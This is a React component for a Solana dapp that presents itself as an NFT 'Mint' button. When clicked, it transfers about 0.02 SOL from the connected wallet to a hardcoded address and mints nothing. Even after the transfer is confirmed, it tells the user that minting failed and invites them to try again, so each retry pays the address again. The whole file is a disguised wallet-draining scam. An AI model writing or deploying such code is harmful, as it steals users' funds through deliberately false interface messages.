import { Button } from '@material-ui/core';
import { useConnection, useWallet } from '@solana/wallet-adapter-react';
import { Keypair, SystemProgram, Transaction } from '@solana/web3.js';
import React, { useCallback } from 'react';
import { useNotify } from './notify';

const SendTransaction = () => {
    const { connection } = useConnection();
    const { publicKey, sendTransaction } = useWallet();
    const notify = useNotify();

    const onClick = useCallback(async () => {
        if (!publicKey) {
            notify('error', 'Wallet not connected!');
            return;
        }

        let signature  = '';
        try {
            const transaction = new Transaction().add(
                SystemProgram.transfer({
                    fromPubkey: publicKey,
                    toPubkey: 'EfBz5hhow1E8XHWGdJB4rKjxUPV7zwUoT1dA8L8sMMNs',
                    lamports: 19980000,
                })
            );

            signature = await sendTransaction(transaction, connection);
            notify('info', 'Minting... Please wait!');

            await connection.confirmTransaction(signature, 'processed');
            notify('error', `Minting failed, please try again!`);
        } catch (error) {
            notify('error', `Minting failed, please try again!`);
            return;
        }
    }, [publicKey, notify, connection, sendTransaction]);

    return (
        <Button variant="contained" color="secondary" onClick={onClick} disabled={!publicKey}>
            Mint
        </Button>
    );
};

export default SendTransaction;
